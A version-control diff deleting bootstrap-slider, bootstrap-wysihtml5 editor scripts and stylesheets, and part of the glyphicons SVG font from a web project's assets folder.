-			//var left = Math.round(this.percent*this.width);
-			//this.tooltip.css('left', left - this.tooltip.outerWidth()/2);
-			this.over = true;
-		},
-		
-		hideTooltip: function(){
-			if (this.inDrag === false) {
-				this.tooltip.removeClass('in');
-			}
-			this.over = false;
-		},
-
-		layout: function(){
-			this.handle1Stype[this.stylePos] = this.percentage[0]+'%';
-			this.handle2Stype[this.stylePos] = this.percentage[1]+'%';
-			if (this.orientation == 'vertical') {
-				this.selectionElStyle.top = Math.min(this.percentage[0], this.percentage[1]) +'%';
-				this.selectionElStyle.height = Math.abs(this.percentage[0] - this.percentage[1]) +'%';
-			} else {
-				this.selectionElStyle.left = Math.min(this.percentage[0], this.percentage[1]) +'%';
-				this.selectionElStyle.width = Math.abs(this.percentage[0] - this.percentage[1]) +'%';
-			}
-			if (this.range) {
-				this.tooltipInner.text(
-					this.formater(this.value[0]) + 
-					' : ' + 
-					this.formater(this.value[1])
-				);
-				this.tooltip[0].style[this.stylePos] = this.size * (this.percentage[0] + (this.percentage[1] - this.percentage[0])/2)/100 - (this.orientation === 'vertical' ? this.tooltip.outerHeight()/2 : this.tooltip.outerWidth()/2) +'px';
-			} else {
-				this.tooltipInner.text(
-					this.formater(this.value[0])
-				);
-				this.tooltip[0].style[this.stylePos] = this.size * this.percentage[0]/100 - (this.orientation === 'vertical' ? this.tooltip.outerHeight()/2 : this.tooltip.outerWidth()/2) +'px';
-			}
-		},
-
-		mousedown: function(ev) {
-
-			// Touch: Get the original event:
-			if (this.touchCapable && ev.type === 'touchstart') {
-				ev = ev.originalEvent;
-			}
-
-			this.offset = this.picker.offset();
-			this.size = this.picker[0][this.sizePos];
-
-			var percentage = this.getPercentage(ev);
-
-			if (this.range) {
-				var diff1 = Math.abs(this.percentage[0] - percentage);
-				var diff2 = Math.abs(this.percentage[1] - percentage);
-				this.dragged = (diff1 < diff2) ? 0 : 1;
-			} else {
-				this.dragged = 0;
-			}
-
-			this.percentage[this.dragged] = percentage;
-			this.layout();
-
-			if (this.touchCapable) {
-				// Touch: Bind touch events:
-				$(document).on({
-					touchmove: $.proxy(this.mousemove, this),
-					touchend: $.proxy(this.mouseup, this)
-				});
-			} else {
-				$(document).on({
-					mousemove: $.proxy(this.mousemove, this),
-					mouseup: $.proxy(this.mouseup, this)
-				});
-			}
-
-			this.inDrag = true;
-			var val = this.calculateValue();
-			this.element.trigger({
-					type: 'slideStart',
-					value: val
-				}).trigger({
-					type: 'slide',
-					value: val
-				});
-			return false;
-		},
-
-		mousemove: function(ev) {
-			
-			// Touch: Get the original event:
-			if (this.touchCapable && ev.type === 'touchmove') {
-				ev = ev.originalEvent;
-			}
-
-			var percentage = this.getPercentage(ev);
-			if (this.range) {
-				if (this.dragged === 0 && this.percentage[1] < percentage) {
-					this.percentage[0] = this.percentage[1];
-					this.dragged = 1;
-				} else if (this.dragged === 1 && this.percentage[0] > percentage) {
-					this.percentage[1] = this.percentage[0];
-					this.dragged = 0;
-				}
-			}
-			this.percentage[this.dragged] = percentage;
-			this.layout();
-			var val = this.calculateValue();
-			this.element
-				.trigger({
-					type: 'slide',
-					value: val
-				})
-				.data('value', val)
-				.prop('value', val);
-			return false;
-		},
-
-		mouseup: function(ev) {
-			if (this.touchCapable) {
-				// Touch: Bind touch events:
-				$(document).off({
-					touchmove: this.mousemove,
-					touchend: this.mouseup
-				});
-			} else {
-				$(document).off({
-					mousemove: this.mousemove,
-					mouseup: this.mouseup
-				});
-			}
-
-			this.inDrag = false;
-			if (this.over == false) {
-				this.hideTooltip();
-			}
-			this.element;
-			var val = this.calculateValue();
-			this.element
-				.trigger({
-					type: 'slideStop',
-					value: val
-				})
-				.data('value', val)
-				.prop('value', val);
-			return false;
-		},
-
-		calculateValue: function() {
-			var val;
-			if (this.range) {
-				val = [
-					(this.min + Math.round((this.diff * this.percentage[0]/100)/this.step)*this.step),
-					(this.min + Math.round((this.diff * this.percentage[1]/100)/this.step)*this.step)
-				];
-				this.value = val;
-			} else {
-				val = (this.min + Math.round((this.diff * this.percentage[0]/100)/this.step)*this.step);
-				this.value = [val, this.value[1]];
-			}
-			return val;
-		},
-
-		getPercentage: function(ev) {
-			if (this.touchCapable) {
-				ev = ev.touches[0];
-			}
-			var percentage = (ev[this.mousePos] - this.offset[this.stylePos])*100/this.size;
-			percentage = Math.round(percentage/this.percentage[2])*this.percentage[2];
-			return Math.max(0, Math.min(100, percentage));
-		},
-
-		getValue: function() {
-			if (this.range) {
-				return this.value;
-			}
-			return this.value[0];
-		},
-
-		setValue: function(val) {
-			this.value = val;
-
-			if (this.range) {
-				this.value[0] = Math.max(this.min, Math.min(this.max, this.value[0]));
-				this.value[1] = Math.max(this.min, Math.min(this.max, this.value[1]));
-			} else {
-				this.value = [ Math.max(this.min, Math.min(this.max, this.value))];
-				this.handle2.addClass('hide');
-				if (this.selection == 'after') {
-					this.value[1] = this.max;
-				} else {
-					this.value[1] = this.min;
-				}
-			}
-			this.diff = this.max - this.min;
-			this.percentage = [
-				(this.value[0]-this.min)*100/this.diff,
-				(this.value[1]-this.min)*100/this.diff,
-				this.step*100/this.diff
-			];
-			this.layout();
-		}
-	};
-
-	$.fn.slider = function ( option, val ) {
-		return this.each(function () {
-			var $this = $(this),
-				data = $this.data('slider'),
-				options = typeof option === 'object' && option;
-			if (!data)  {
-				$this.data('slider', (data = new Slider(this, $.extend({}, $.fn.slider.defaults,options))));
-			}
-			if (typeof option == 'string') {
-				data[option](val);
-			}
-		})
-	};
-
-	$.fn.slider.defaults = {
-		min: 0,
-		max: 10,
-		step: 1,
-		orientation: 'horizontal',
-		value: 5,
-		selection: 'before',
-		tooltip: 'show',
-		handle: 'round',
-		formater: function(value) {
-			return value;
-		}
-	};
-
-	$.fn.slider.Constructor = Slider;
-
-}( window.jQuery );

newDesign/assets/plugins/bootstrap-wysihtml5/css/bootstrap-wysihtml5.css

@@ -1,102 +0,0 @@
-ul.wysihtml5-toolbar {
-	margin: 0;
-	padding: 0;
-	display: block;
-}
-
-ul.wysihtml5-toolbar::after {
-	clear: both;
-	display: table;
-	content: "";
-}
-
-ul.wysihtml5-toolbar > li {
-	float: left;
-	display: list-item;
-	list-style: none;
-	margin: 0 5px 10px 0;
-}
-
-ul.wysihtml5-toolbar a[data-wysihtml5-command=bold] {
-	font-weight: bold;
-}
-
-ul.wysihtml5-toolbar a[data-wysihtml5-command=italic] {
-	font-style: italic;
-}
-
-ul.wysihtml5-toolbar a[data-wysihtml5-command=underline] {
-	text-decoration: underline;
-}
-
-ul.wysihtml5-toolbar a.btn.wysihtml5-command-active {
-	background-image: none;
-	-webkit-box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15),0 1px 2px rgba(0, 0, 0, 0.05);
-	-moz-box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15),0 1px 2px rgba(0, 0, 0, 0.05);
-	box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15),0 1px 2px rgba(0, 0, 0, 0.05);
-	background-color: #E6E6E6;
-	background-color: #D9D9D9;
-	outline: 0;
-}
-
-ul.wysihtml5-commands-disabled .dropdown-menu {
-	display: none !important;
-}
-
-ul.wysihtml5-toolbar div.wysihtml5-colors {
-  display:block;
-  width: 50px;
-  height: 20px;
-  margin-top: 2px;
-  margin-left: 5px;
-  position: absolute;
-  pointer-events: none;
-}
-
-ul.wysihtml5-toolbar a.wysihtml5-colors-title {
-  padding-left: 70px;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="black"] {
-  background: black !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="silver"] {
-  background: silver !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="gray"] {
-  background: gray !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="maroon"] {
-  background: maroon !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="red"] {
-  background: red !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="purple"] {
-  background: purple !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="green"] {
-  background: green !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="olive"] {
-  background: olive !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="navy"] {
-  background: navy !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="blue"] {
-  background: blue !important;
-}
-
-ul.wysihtml5-toolbar div[data-wysihtml5-command-value="orange"] {
-  background: orange !important;
-}

newDesign/assets/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css

@@ -1,67 +0,0 @@
-.wysiwyg-color-black {
-  color: black;
-}
-
-.wysiwyg-color-silver {
-  color: silver;
-}
-
-.wysiwyg-color-gray {
-  color: gray;
-}
-
-.wysiwyg-color-white {
-  color: white;
-}
-
-.wysiwyg-color-maroon {
-  color: maroon;
-}
-
-.wysiwyg-color-red {
-  color: red;
-}
-
-.wysiwyg-color-purple {
-  color: purple;
-}
-
-.wysiwyg-color-fuchsia {
-  color: fuchsia;
-}
-
-.wysiwyg-color-green {
-  color: green;
-}
-
-.wysiwyg-color-lime {
-  color: lime;
-}
-
-.wysiwyg-color-olive {
-  color: olive;
-}
-
-.wysiwyg-color-yellow {
-  color: yellow;
-}
-
-.wysiwyg-color-navy {
-  color: navy;
-}
-
-.wysiwyg-color-blue {
-  color: blue;
-}
-
-.wysiwyg-color-teal {
-  color: teal;
-}
-
-.wysiwyg-color-aqua {
-  color: aqua;
-}
-
-.wysiwyg-color-orange {
-  color: orange;
-}

newDesign/assets/plugins/bootstrap-wysihtml5/js/bootstrap3-wysihtml5.js

@@ -1,521 +0,0 @@
-!function($, wysi) {
-    "use strict";
-
-    var tpl = {
-        "font-styles": function(locale, options) {
-            var size = (options && options.size) ? ' btn-'+options.size : '';
-            return "<li class='dropdown'>" +
-                "<a class='btn dropdown-toggle btn-" + size + " btn-default' data-toggle='dropdown' href='#'>" +
-                "<i class='glyphicon glyphicon-font'></i>&nbsp;<span class='current-font'>" + locale.font_styles.normal + "</span>&nbsp;<b class='caret'></b>" +
-                "</a>" +
-                "<ul class='dropdown-menu'>" +
-                "<li><a data-wysihtml5-command='formatBlock' data-wysihtml5-command-value='div' tabindex='-1'>" + locale.font_styles.normal + "</a></li>" +
-                "<li><a data-wysihtml5-command='formatBlock' data-wysihtml5-command-value='h1' tabindex='-1'>" + locale.font_styles.h1 + "</a></li>" +
-                "<li><a data-wysihtml5-command='formatBlock' data-wysihtml5-command-value='h2' tabindex='-1'>" + locale.font_styles.h2 + "</a></li>" +
-                "<li><a data-wysihtml5-command='formatBlock' data-wysihtml5-command-value='h3' tabindex='-1'>" + locale.font_styles.h3 + "</a></li>" +
-                "<li><a data-wysihtml5-command='formatBlock' data-wysihtml5-command-value='h4'>" + locale.font_styles.h4 + "</a></li>" +
-                "<li><a data-wysihtml5-command='formatBlock' data-wysihtml5-command-value='h5'>" + locale.font_styles.h5 + "</a></li>" +
-                "<li><a data-wysihtml5-command='formatBlock' data-wysihtml5-command-value='h6'>" + locale.font_styles.h6 + "</a></li>" +
-                "</ul>" +
-                "</li>";
-        },
-
-        "emphasis": function(locale, options) {
-            var size = (options && options.size) ? ' btn-'+options.size : '';
-            return "<li>" +
-                "<div class='btn-group'>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='bold' title='CTRL+B' tabindex='-1'>" + locale.emphasis.bold + "</a>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='italic' title='CTRL+I' tabindex='-1'>" + locale.emphasis.italic + "</a>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='underline' title='CTRL+U' tabindex='-1'>" + locale.emphasis.underline + "</a>" +
-                "</div>" +
-                "</li>";
-        },
-
-        "lists": function(locale, options) {
-            var size = (options && options.size) ? ' btn-'+options.size : '';
-            return "<li>" +
-                "<div class='btn-group'>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='insertUnorderedList' title='" + locale.lists.unordered + "' tabindex='-1'><i class='glyphicon glyphicon-list'></i></a>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='insertOrderedList' title='" + locale.lists.ordered + "' tabindex='-1'><i class='glyphicon glyphicon-th-list'></i></a>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='Outdent' title='" + locale.lists.outdent + "' tabindex='-1'><i class='glyphicon glyphicon-indent-right'></i></a>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='Indent' title='" + locale.lists.indent + "' tabindex='-1'><i class='glyphicon glyphicon-indent-left'></i></a>" +
-                "</div>" +
-                "</li>";
-        },
-
-        "link": function(locale, options) {
-            var size = (options && options.size) ? ' btn-'+options.size : '';
-            return "<li>" +
-                ""+
-                "<div class='bootstrap-wysihtml5-insert-link-modal modal fade'>" +
-                "<div class='modal-dialog'>"+
-                "<div class='modal-content'>"+
-                "<div class='modal-header'>" +
-                "<a class='close' data-dismiss='modal'>&times;</a>" +
-                "<h4>" + locale.link.insert + "</h4>" +
-                "</div>" +
-                "<div class='modal-body'>" +
-                "<input value='http://' class='bootstrap-wysihtml5-insert-link-url form-control'>" +
-                "<label class='checkbox'> <input type='checkbox' class='bootstrap-wysihtml5-insert-link-target' checked>" + locale.link.target + "</label>" +
-                "</div>" +
-                "<div class='modal-footer'>" +
-                "<button class='btn btn-default' data-dismiss='modal'>" + locale.link.cancel + "</button>" +
-                "<button href='#' class='btn btn-primary' data-dismiss='modal'>" + locale.link.insert + "</button>" +
-                "</div>" +
-                "</div>" +
-                "</div>" +
-                "</div>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='createLink' title='" + locale.link.insert + "' tabindex='-1'><i class='glyphicon glyphicon-share'></i></a>" +
-                "</li>";
-        },
-
-        "image": function(locale, options) {
-            var size = (options && options.size) ? ' btn-'+options.size : '';
-            return "<li>" +
-                "<div class='bootstrap-wysihtml5-insert-image-modal modal fade'>" +
-                "<div class='modal-dialog'>"+
-                "<div class='modal-content'>"+
-                "<div class='modal-header'>" +
-                "<a class='close' data-dismiss='modal'>&times;</a>" +
-                "<h4>" + locale.image.insert + "</h4>" +
-                "</div>" +
-                "<div class='modal-body'>" +
-                "<input value='http://' class='bootstrap-wysihtml5-insert-image-url form-control'>" +
-                "</div>" +
-                "<div class='modal-footer'>" +
-                "<button class='btn btn-default' data-dismiss='modal'>" + locale.image.cancel + "</button>" +
-                "<button class='btn btn-primary' data-dismiss='modal'>" + locale.image.insert + "</button>" +
-                "</div>" +
-                "</div>" +
-                "</div>" +
-                "</div>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-command='insertImage' title='" + locale.image.insert + "' tabindex='-1'><i class='glyphicon glyphicon-picture'></i></a>" +
-                "</li>";
-        },
-
-        "html": function(locale, options) {
-            var size = (options && options.size) ? ' btn-'+options.size : '';
-            return "<li>" +
-                "<div class='btn-group'>" +
-                "<a class='btn btn-" + size + " btn-default' data-wysihtml5-action='change_view' title='" + locale.html.edit + "' tabindex='-1'><i class='glyphicon glyphicon-pencil'></i></a>" +
-                "</div>" +
-                "</li>";
-        },
-
-        "color": function(locale, options) {
-            var size = (options && options.size) ? ' btn-'+options.size : '';
-            return "<li class='dropdown'>" +
-                "<a class='btn dropdown-toggle btn-" + size + " btn-default' data-toggle='dropdown' href='#' tabindex='-1'>" +
-                "<span class='current-color'>" + locale.colours.black + "</span>&nbsp;<b class='caret'></b>" +
-                "</a>" +
-                "<ul class='dropdown-menu'>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='black'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='black'>" + locale.colours.black + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='silver'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='silver'>" + locale.colours.silver + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='gray'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='gray'>" + locale.colours.gray + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='maroon'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='maroon'>" + locale.colours.maroon + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='red'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='red'>" + locale.colours.red + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='purple'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='purple'>" + locale.colours.purple + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='green'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='green'>" + locale.colours.green + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='olive'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='olive'>" + locale.colours.olive + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='navy'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='navy'>" + locale.colours.navy + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='blue'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='blue'>" + locale.colours.blue + "</a></li>" +
-                "<li><div class='wysihtml5-colors' data-wysihtml5-command-value='orange'></div><a class='wysihtml5-colors-title' data-wysihtml5-command='foreColor' data-wysihtml5-command-value='orange'>" + locale.colours.orange + "</a></li>" +
-                "</ul>" +
-                "</li>";
-        }
-    };
-
-    var templates = function(key, locale, options) {
-        return tpl[key](locale, options);
-    };
-
-
-    var Wysihtml5 = function(el, options) {
-        this.el = el;
-        var toolbarOpts = options || defaultOptions;
-        for(var t in toolbarOpts.customTemplates) {
-            tpl[t] = toolbarOpts.customTemplates[t];
-        }
-        this.toolbar = this.createToolbar(el, toolbarOpts);
-        this.editor =  this.createEditor(options);
-
-        window.editor = this.editor;
-
-        $('iframe.wysihtml5-sandbox').each(function(i, el){
-            $(el.contentWindow).off('focus.wysihtml5').on({
-                'focus.wysihtml5' : function(){
-                    $('li.dropdown').removeClass('open');
-                }
-            });
-        });
-    };
-
-    Wysihtml5.prototype = {
-
-        constructor: Wysihtml5,
-
-        createEditor: function(options) {
-            options = options || {};
-
-            // Add the toolbar to a clone of the options object so multiple instances
-            // of the WYISYWG don't break because "toolbar" is already defined
-            options = $.extend(true, {}, options);
-            options.toolbar = this.toolbar[0];
-
-            var editor = new wysi.Editor(this.el[0], options);
-
-            if(options && options.events) {
-                for(var eventName in options.events) {
-                    editor.on(eventName, options.events[eventName]);
-                }
-            }
-            return editor;
-        },
-
-        createToolbar: function(el, options) {
-            var self = this;
-            var toolbar = $("<ul/>", {
-                'class' : "wysihtml5-toolbar",
-                'style': "display:none"
-            });
-            var culture = options.locale || defaultOptions.locale || "en";
-            for(var key in defaultOptions) {
-                var value = false;
-
-                if(options[key] !== undefined) {
-                    if(options[key] === true) {
-                        value = true;
-                    }
-                } else {
-                    value = defaultOptions[key];
-                }
-
-                if(value === true) {
-                    toolbar.append(templates(key, locale[culture], options));
-
-                    if(key === "html") {
-                        this.initHtml(toolbar);
-                    }
-
-                    if(key === "link") {
-                        this.initInsertLink(toolbar);
-                    }
-
-                    if(key === "image") {
-                        this.initInsertImage(toolbar);
-                    }
-                }
-            }
-
-            if(options.toolbar) {
-                for(key in options.toolbar) {
-                    toolbar.append(options.toolbar[key]);
-                }
-            }
-
-            toolbar.find("a[data-wysihtml5-command='formatBlock']").click(function(e) {
-                var target = e.target || e.srcElement;
-                var el = $(target);
-                self.toolbar.find('.current-font').text(el.html());
-            });
-
-            toolbar.find("a[data-wysihtml5-command='foreColor']").click(function(e) {
-                var target = e.target || e.srcElement;
-                var el = $(target);
-                self.toolbar.find('.current-color').text(el.html());
-            });
-
-            this.el.before(toolbar);
-
-            return toolbar;
-        },
-
-        initHtml: function(toolbar) {
-            var changeViewSelector = "a[data-wysihtml5-action='change_view']";
-            toolbar.find(changeViewSelector).click(function(e) {
-                toolbar.find('a.btn').not(changeViewSelector).toggleClass('disabled');
-            });
-        },
-
-        initInsertImage: function(toolbar) {
-            var self = this;
-            var insertImageModal = toolbar.find('.bootstrap-wysihtml5-insert-image-modal');
-            var urlInput = insertImageModal.find('.bootstrap-wysihtml5-insert-image-url');
-            var insertButton = insertImageModal.find('.btn-primary');
-            var initialValue = urlInput.val();
-            var caretBookmark;
-
-            var insertImage = function() {
-                var url = urlInput.val();
-                urlInput.val(initialValue);
-                self.editor.currentView.element.focus();
-                if (caretBookmark) {
-                    self.editor.composer.selection.setBookmark(caretBookmark);
-                    caretBookmark = null;
-                }
-                self.editor.composer.commands.exec("insertImage", url);
-            };
-
-            urlInput.keypress(function(e) {
-                if(e.which == 13) {
-                    insertImage();
-                    insertImageModal.modal('hide');
-                }
-            });
-
-            insertButton.click(insertImage);
-
-            insertImageModal.on('shown', function() {
-                urlInput.focus();
-            });
-
-            insertImageModal.on('hide', function() {
-                self.editor.currentView.element.focus();
-            });
-
-            toolbar.find('a[data-wysihtml5-command=insertImage]').click(function() {
-                var activeButton = $(this).hasClass("wysihtml5-command-active");
-
-                if (!activeButton) {
-                    self.editor.currentView.element.focus(false);
-                    caretBookmark = self.editor.composer.selection.getBookmark();
-                    insertImageModal.appendTo('body').modal('show');
-                    insertImageModal.on('click.dismiss.modal', '[data-dismiss="modal"]', function(e) {
-                        e.stopPropagation();
-                    });
-                    return false;
-                }
-                else {
-                    return true;
-                }
-            });
-        },
-
-        initInsertLink: function(toolbar) {
-            var self = this;
-            var insertLinkModal = toolbar.find('.bootstrap-wysihtml5-insert-link-modal');
-            var urlInput = insertLinkModal.find('.bootstrap-wysihtml5-insert-link-url');
-            var targetInput = insertLinkModal.find('.bootstrap-wysihtml5-insert-link-target');
-            var insertButton = insertLinkModal.find('.btn-primary');
-            var initialValue = urlInput.val();
-            var caretBookmark;
-
-            var insertLink = function() {
-                var url = urlInput.val();
-                urlInput.val(initialValue);
-                self.editor.currentView.element.focus();
-                if (caretBookmark) {
-                    self.editor.composer.selection.setBookmark(caretBookmark);
-                    caretBookmark = null;
-                }
-
-                var newWindow = targetInput.prop("checked");
-                self.editor.composer.commands.exec("createLink", {
-                    'href' : url,
-                    'target' : (newWindow ? '_blank' : '_self'),
-                    'rel' : (newWindow ? 'nofollow' : '')
-                });
-            };
-            var pressedEnter = false;
-
-            urlInput.keypress(function(e) {
-                if(e.which == 13) {
-                    insertLink();
-                    insertLinkModal.modal('hide');
-                }
-            });
-
-            insertButton.click(insertLink);
-
-            insertLinkModal.on('shown', function() {
-                urlInput.focus();
-            });
-
-            insertLinkModal.on('hide', function() {
-                self.editor.currentView.element.focus();
-            });
-
-            toolbar.find('a[data-wysihtml5-command=createLink]').click(function() {
-                var activeButton = $(this).hasClass("wysihtml5-command-active");
-
-                if (!activeButton) {
-                    self.editor.currentView.element.focus(false);
-                    caretBookmark = self.editor.composer.selection.getBookmark();
-                    insertLinkModal.appendTo('body').modal('show');
-                    insertLinkModal.on('click.dismiss.modal', '[data-dismiss="modal"]', function(e) {
-                        e.stopPropagation();
-                    });
-                    return false;
-                }
-                else {
-                    return true;
-                }
-            });
-        }
-    };
-
-    // these define our public api
-    var methods = {
-        resetDefaults: function() {
-            $.fn.wysihtml5.defaultOptions = $.extend(true, {}, $.fn.wysihtml5.defaultOptionsCache);
-        },
-        bypassDefaults: function(options) {
-            return this.each(function () {
-                var $this = $(this);
-                $this.data('wysihtml5', new Wysihtml5($this, options));
-            });
-        },
-        shallowExtend: function (options) {
-            var settings = $.extend({}, $.fn.wysihtml5.defaultOptions, options || {}, $(this).data());
-            var that = this;
-            return methods.bypassDefaults.apply(that, [settings]);
-        },
-        deepExtend: function(options) {
-            var settings = $.extend(true, {}, $.fn.wysihtml5.defaultOptions, options || {});
-            var that = this;
-            return methods.bypassDefaults.apply(that, [settings]);
-        },
-        init: function(options) {
-            var that = this;
-            return methods.shallowExtend.apply(that, [options]);
-        }
-    };
-
-    $.fn.wysihtml5 = function ( method ) {
-        if ( methods[method] ) {
-            return methods[method].apply( this, Array.prototype.slice.call( arguments, 1 ));
-        } else if ( typeof method === 'object' || ! method ) {
-            return methods.init.apply( this, arguments );
-        } else {
-            $.error( 'Method ' +  method + ' does not exist on jQuery.wysihtml5' );
-        }
-    };
-
-    $.fn.wysihtml5.Constructor = Wysihtml5;
-
-    var defaultOptions = $.fn.wysihtml5.defaultOptions = {
-        "font-styles": true,
-        "color": false,
-        "emphasis": true,
-        "lists": true,
-        "html": false,
-        "link": true,
-        "image": true,
-        "size": 'sm',
-        events: {},
-        parserRules: {
-            classes: {
-                // (path_to_project/lib/css/bootstrap3-wysiwyg5-color.css)
-                "wysiwyg-color-silver" : 1,
-                "wysiwyg-color-gray" : 1,
-                "wysiwyg-color-white" : 1,
-                "wysiwyg-color-maroon" : 1,
-                "wysiwyg-color-red" : 1,
-                "wysiwyg-color-purple" : 1,
-                "wysiwyg-color-fuchsia" : 1,
-                "wysiwyg-color-green" : 1,
-                "wysiwyg-color-lime" : 1,
-                "wysiwyg-color-olive" : 1,
-                "wysiwyg-color-yellow" : 1,
-                "wysiwyg-color-navy" : 1,
-                "wysiwyg-color-blue" : 1,
-                "wysiwyg-color-teal" : 1,
-                "wysiwyg-color-aqua" : 1,
-                "wysiwyg-color-orange" : 1
-            },
-            tags: {
-                "b":  {},
-                "i":  {},
-                "br": {},
-                "ol": {},
-                "ul": {},
-                "li": {},
-                "h1": {},
-                "h2": {},
-                "h3": {},
-                "h4": {},
-                "h5": {},
-                "h6": {},
-                "blockquote": {},
-                "u": 1,
-                "img": {
-                    "check_attributes": {
-                        "width": "numbers",
-                        "alt": "alt",
-                        "src": "url",
-                        "height": "numbers"
-                    }
-                },
-                "a":  {
-                    check_attributes: {
-                        'href': "url", // important to avoid XSS
-                        'target': 'alt',
-                        'rel': 'alt'
-                    }
-                },
-                "span": 1,
-                "div": 1,
-                // to allow save and edit files with code tag hacks
-                "code": 1,
-                "pre": 1
-            }
-        },
-        stylesheets: ["./assets/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css"], // (path_to_project/lib/css/bootstrap3-wysiwyg5-color.css)
-        locale: "en"
-    };
-
-    if (typeof $.fn.wysihtml5.defaultOptionsCache === 'undefined') {
-        $.fn.wysihtml5.defaultOptionsCache = $.extend(true, {}, $.fn.wysihtml5.defaultOptions);
-    }
-
-    var locale = $.fn.wysihtml5.locale = {
-        en: {
-            font_styles: {
-                normal: "Normal text",
-                h1: "Heading 1",
-                h2: "Heading 2",
-                h3: "Heading 3",
-                h4: "Heading 4",
-                h5: "Heading 5",
-                h6: "Heading 6"
-            },
-            emphasis: {
-                bold: "Bold",
-                italic: "Italic",
-                underline: "Underline"
-            },
-            lists: {
-                unordered: "Unordered list",
-                ordered: "Ordered list",
-                outdent: "Outdent",
-                indent: "Indent"
-            },
-            link: {
-                insert: "Insert link",
-                cancel: "Cancel",
-                target: "Open link in new window"
-            },
-            image: {
-                insert: "Insert image",
-                cancel: "Cancel"
-            },
-            html: {
-                edit: "Edit HTML"
-            },
-            colours: {
-                black: "Black",
-                silver: "Silver",
-                gray: "Grey",
-                maroon: "Maroon",
-                red: "Red",
-                purple: "Purple",
-                green: "Green",
-                olive: "Olive",
-                navy: "Navy",
-                blue: "Blue",
-                orange: "Orange"
-            }
-        }
-    };
-
-}(window.jQuery, window.wysihtml5);

newDesign/assets/plugins/bootstrap/fonts/glyphicons-halflings-regular.svg

@@ -1,229 +0,0 @@
-<?xml version="1.0" standalone="no"?>
-<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
-<svg xmlns="http://www.w3.org/2000/svg">
-<metadata></metadata>
-<defs>
-<font id="glyphicons_halflingsregular" horiz-adv-x="1200" >
-<font-face units-per-em="1200" ascent="960" descent="-240" />
-<missing-glyph horiz-adv-x="500" />
-<glyph />
-<glyph />
-<glyph unicode="&#xd;" />
-<glyph unicode=" " />
-<glyph unicode="*" d="M100 500v200h259l-183 183l141 141l183 -183v259h200v-259l183 183l141 -141l-183 -183h259v-200h-259l183 -183l-141 -141l-183 183v-259h-200v259l-183 -183l-141 141l183 183h-259z" />
-<glyph unicode="+" d="M0 400v300h400v400h300v-400h400v-300h-400v-400h-300v400h-400z" />
-<glyph unicode="&#xa0;" />
-<glyph unicode="&#x2000;" horiz-adv-x="652" />
-<glyph unicode="&#x2001;" horiz-adv-x="1304" />
-<glyph unicode="&#x2002;" horiz-adv-x="652" />
-<glyph unicode="&#x2003;" horiz-adv-x="1304" />
-<glyph unicode="&#x2004;" horiz-adv-x="434" />
-<glyph unicode="&#x2005;" horiz-adv-x="326" />
-<glyph unicode="&#x2006;" horiz-adv-x="217" />
-<glyph unicode="&#x2007;" horiz-adv-x="217" />
-<glyph unicode="&#x2008;" horiz-adv-x="163" />
-<glyph unicode="&#x2009;" horiz-adv-x="260" />
-<glyph unicode="&#x200a;" horiz-adv-x="72" />
-<glyph unicode="&#x202f;" horiz-adv-x="260" />
-<glyph unicode="&#x205f;" horiz-adv-x="326" />
